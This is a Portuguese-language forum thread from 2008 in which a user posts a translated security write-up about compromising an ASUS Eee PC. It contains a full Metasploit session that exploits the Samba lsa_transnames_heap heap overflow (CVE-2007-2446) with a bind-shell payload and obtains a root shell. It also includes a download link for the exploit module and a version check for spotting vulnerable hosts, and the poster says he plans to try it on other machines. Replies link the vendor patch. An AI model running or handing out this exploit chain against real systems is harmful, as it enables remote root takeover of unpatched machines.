ASUS EeePC Owned!

Iniciado por kohx, 01 de Dezembro , 2008, 04:17:49 PM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

kohx

ASUS EeePC Owned!


Tradução do artigo feito pelo pessoal da RISE Security. Eles fizeram alguns testes no ASUS Eee PC.

"A primeira coisa que fiz ao colocar as mãos no ASUS Eee PC foi testar a sua segurança. O ASUS Eee Pc vem com uma versão personalizada do Xandros como sistema operacional e outros softwares "empacotados" como, Firefox, Pidgin, Skype e OpenOffice.
Analisando os processos em execução a primeira coisa que me chamou atenção foi o processo smbd rodand (o daemon sshd foi iniciado por nós, não vem ativado por default).




eeepc-rise:/root> ps -e
PID TTY TIME CMD
1 ? 00:00:00 fastinit
2 ? 00:00:00 ksoftirqd/0
3 ? 00:00:00 events/0
4 ? 00:00:00 khelper
5 ? 00:00:00 kthread
25 ? 00:00:00 kblockd/0
26 ? 00:00:00 kacpid
128 ? 00:00:00 ata/0
129 ? 00:00:00 ata_aux
130 ? 00:00:00 kseriod
148 ? 00:00:00 pdflush
149 ? 00:00:00 pdflush
150 ? 00:00:00 kswapd0
151 ? 00:00:00 aio/0
152 ? 00:00:00 unionfs_siod/0
778 ? 00:00:00 scsi_eh_0
779 ? 00:00:00 scsi_eh_1
799 ? 00:00:00 kpsmoused
819 ? 00:00:00 kjournald
855 ? 00:00:00 fastinit
857 ? 00:00:00 sh
858 ? 00:00:00 su
859 tty3 00:00:00 getty
862 ? 00:00:00 startx
880 ? 00:00:00 xinit
881 tty2 00:00:06 Xorg
890 ? 00:00:00 udevd
952 ? 00:00:00 ksuspend_usbd
953 ? 00:00:00 khubd
1002 ? 00:00:00 acpid
1027 ? 00:00:00 pciehpd_event
1055 ? 00:00:00 ifplugd
1101 ? 00:00:00 scsi_eh_2
1102 ? 00:00:00 usb-storage
1151 ? 00:00:00 icewm
1185 ? 00:00:01 AsusLauncher
1186 ? 00:00:00 icewmtray
1188 ? 00:00:01 powermonitor
1190 ? 00:00:00 minimixer
1191 ? 00:00:00 networkmonitor
1192 ? 00:00:00 wapmonitor
1193 ? 00:00:00 x-session-manag
1195 ? 00:00:00 x-session-manag
1200 ? 00:00:00 x-session-manag
1201 ? 00:00:00 dispwatch
1217 ? 00:00:00 cupsd
1224 ? 00:00:00 usbstorageapple
1234 ? 00:00:00 kondemand/0
1240 ? 00:00:00 portmap
1248 ? 00:00:00 keyboardstatus
1272 ? 00:00:00 memd
1279 ? 00:00:00 scim-helper-man
1280 ? 00:00:00 scim-panel-gtk
1282 ? 00:00:00 scim-launcher
1297 ? 00:00:00 netserv
1331 ? 00:00:00 asusosd
1476 ? 00:00:00 xandrosncs-agen
1775 ? 00:00:00 dhclient3
2002 ? 00:00:00 nmbd
2004 ? 00:00:00 smbd
2005 ? 00:00:00 smbd

2322 ? 00:00:00 sshd
2345 ? 00:00:00 sshd
2356 pts/0 00:00:00 bash
2362 pts/0 00:00:00 ps
eeepc-rise:/root>


Descobrimos que a versão do Samba está vulnerável (Samba lsa_io_trans_names Heap Overflow), e um exploit foi publicado ano passado.


eeepc-rise:/root> smbd –version
Version 3.0.24
eeepc-rise:/root>


Com essa informação, nós rodamos o exploit contra o ASUS Eee PC, usando como alvo o Debian/Ubuntu (Xandros é baseado no Corel Linux, que é baseado no Debian).


eeepc-rise:/root> use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
RHOST => 192.168.50.10
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > show targetsExploit targets:Id Name
-- ----
0 Linux vsyscall
1 Linux Heap Brute Force (Debian/Ubuntu)
2 Linux Heap Brute Force (Gentoo)
3 Linux Heap Brute Force (Mandriva)
4 Linux Heap Brute Force (RHEL/CentOS)
5 Linux Heap Brute Force (SUSE)
6 Linux Heap Brute Force (Slackware)
7 DEBUG
msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
  • Started bind handler
  • Creating nop sled....
    ...
  • Trying to exploit Samba with address 0×08415000...
  • Connecting to the SMB service...
  • Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
  • Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
  • Calling the vulnerable function...
  • Server did not respond, this is expected
  • Command shell session 1 opened (192.168.50.201:33694 -> 192.168.50.10:4444)
    msf exploit(lsa_transnames_heap) > sessions -i 1
  • Starting interaction with 1...
    uname -a
    Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686 GNU/Linux
    id
    uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)".


    Game Over!

    Espero que os senhores gostem. Kd o rapaz com o Eee PC??
    Fui. =)

Reeves

Very GooD Kohx

interessante como a insegurança vem de fábrica, será que ta incluso no preço ?
então... compre seu Eeepc e não se esqueça de dar o update no O.S!
no caso de debian, faça bom uso do apt !

:P
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

kohx

É sim muito interessante como isso já vem de Fábrica  ::)

Quem tem seu bonitinho EeePC não precisará atualizar o kernel ou fazer outros updates no OS, apenas vai precisar aplicar um patch que foi publicado no próprio site do samba.

> http://us1.samba.org/samba/security/CVE-2007-2446.html

O pior (ou melhor =) de tudo é q é remoto.......

``CVE-2007-2446: Multiple Heap Overflows Allow Remote Code Execution``

Se não me engano tem o xpl no packetstorm  :-X


Thanks

S3ijy

xD, item de série!

Tá mais pra uma boa prova de como os fabricantes nunca vão conseguir fazer as coisas 100% seguras, mesmo a grande asus pisa na bola.

Thx for Sharing;
S3ijy

kohx

("

Voltando no tópico pra deixa o exploit pra galera, e mais algumas dicas =]

xpl > http://cysy.com.br/dw/k0hxmirror/lsa_transnames_heap.rb (sim, é um módulo do msploit).

Quem tiver uma maquina rodando o samba e quiser verificar a versão digite

# smbd –version

Se a versão for 3.0.24 ou anterior ta vuln  =D

Testarei brevemente com umas maquinas aqui =]


Falouzz...

:-*